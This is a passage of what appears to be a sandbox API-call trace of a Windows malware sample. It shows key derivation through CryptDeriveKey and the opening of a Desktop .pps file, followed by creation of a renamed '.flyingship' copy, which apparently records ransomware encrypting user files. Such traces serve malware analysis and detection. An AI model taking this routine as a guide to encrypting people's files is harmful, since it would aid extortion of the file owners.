lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0158.612] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0158.612] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0158.612] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0158.612] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0158.613] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0158.613] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0158.613] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0158.617] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0158.617] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0158.617] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0158.617] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0158.617] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0158.617] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0158.617] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0158.617] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0158.617] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0158.617] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0158.617] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0158.618] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0158.618] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0158.618] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0158.618] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0158.618] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0158.618] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0158.618] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0158.618] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0158.618] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0158.618] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0158.618] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0158.618] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0158.618] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0158.618] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0158.618] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0158.618] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0158.618] CryptCreateHash (in: hProv=0x9c0c88, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x87e808 | out: phHash=0x87e808) returned 1 [0158.618] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0158.619] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0158.619] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0158.619] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0158.619] CharLowerBuffW (in: lpsz="byte[25]", cchLength=0x8 | out: lpsz="byte[25]") returned 0x8 [0158.619] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0158.619] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0158.619] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0158.619] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0158.620] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0158.620] CryptHashData (hHash=0x90af58, pbData=0x8dee70, dwDataLen=0x19, dwFlags=0x1) returned 1 [0158.620] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0158.620] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0158.620] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0158.620] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0158.620] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0158.620] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0158.620] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0158.620] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0158.620] CryptDeriveKey (in: hProv=0x9c0c88, Algid=0x660e, hBaseData=0x90af58, dwFlags=0x1, phKey=0x87e808 | out: phKey=0x87e808*=0x90aed8) returned 1 [0158.620] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0158.621] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0158.621] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0158.621] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0158.621] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0158.621] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0158.621] PeekMessageW (in: lpMsg=0x87e944, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e944) returned 0 [0158.621] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0158.621] CryptDestroyHash (hHash=0x90af58) returned 1 [0158.621] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28c8 [0158.621] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0158.621] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26d8 [0158.621] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0158.621] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0158.621] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5a0 [0158.621] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2628 [0158.621] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0158.621] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28c8 [0158.621] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0c8 [0158.622] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba000 [0158.622] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26d8 [0158.622] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0158.622] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2768 [0158.622] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0158.622] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2618 [0158.622] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0158.622] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0158.622] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0158.622] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2768 [0158.622] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded80 [0158.622] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0158.622] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0158.622] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0158.625] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\DBSZqxeH.pps" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\dbszqxeh.pps"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x138 [0158.625] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0158.625] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87ef40 | out: lpNewFilePointer=0x0) returned 1 [0158.626] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0158.626] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd570 [0158.626] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2738 [0158.626] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0158.626] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0158.626] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0158.626] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded80 | out: hHeap=0x8a0000) returned 1 [0158.626] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0158.626] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0158.626] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2768 [0158.626] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0158.626] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0158.626] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0158.626] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0158.626] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0158.626] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af58 [0158.627] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0158.627] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af58 | out: hHeap=0x8a0000) returned 1 [0158.627] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0158.627] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2768 [0158.627] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded80 [0158.627] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0158.627] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0158.627] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0158.627] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0158.627] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0158.627] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0158.627] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26c8 [0158.627] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0158.627] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0158.627] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0158.627] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0158.627] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0d8 [0158.628] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0158.628] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0158.628] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26c8 [0158.628] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8a0 [0158.628] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2788 [0158.628] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0158.628] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0158.628] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0158.628] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0158.628] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd780 [0158.628] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2838 [0158.628] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0158.628] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0158.628] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27f8 [0158.628] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x80) returned 0x9c0b78 [0158.628] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0158.628] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x50) returned 0x923ad0 [0158.628] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0158.628] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x50) returned 0x923b28 [0158.629] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0b78 | out: hHeap=0x8a0000) returned 1 [0158.629] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0158.629] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0158.629] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0158.629] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0158.629] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0158.629] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x923ad0 | out: hHeap=0x8a0000) returned 1 [0158.629] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0158.629] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0158.629] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0158.629] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2788 [0158.629] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x50) returned 0x923ad0 [0158.629] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0158.629] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x923ad0 | out: hHeap=0x8a0000) returned 1 [0158.629] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0158.630] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x923b28 | out: hHeap=0x8a0000) returned 1 [0158.630] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0158.630] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0158.630] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0158.630] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af58 [0158.630] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10000) returned 0x9d5188 [0158.630] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0d8 [0158.630] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0158.630] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\DBSZqxeH.flyingship.pps" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\dbszqxeh.flyingship.pps"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0158.636] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df208 [0158.636] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8a0 [0158.636] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26c8 [0158.636] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0158.636] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0158.637] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0158.637] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded80 | out: hHeap=0x8a0000) returned 1 [0158.637] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0158.637] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0158.637] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2768 [0158.637] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0158.637] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2788 [0158.637] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0158.637] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0158.637] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0158.637] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af98 [0158.637] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0158.637] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af98 | out: hHeap=0x8a0000) returned 1 [0158.637] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0158.637] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af98 [0158.637] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0158.637] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2768 [0158.637] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded80 [0158.637] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0158.637] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0158.637] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0158.637] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0158.637] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0158.638] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0158.638] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0158.638] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0158.638] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0158.638] 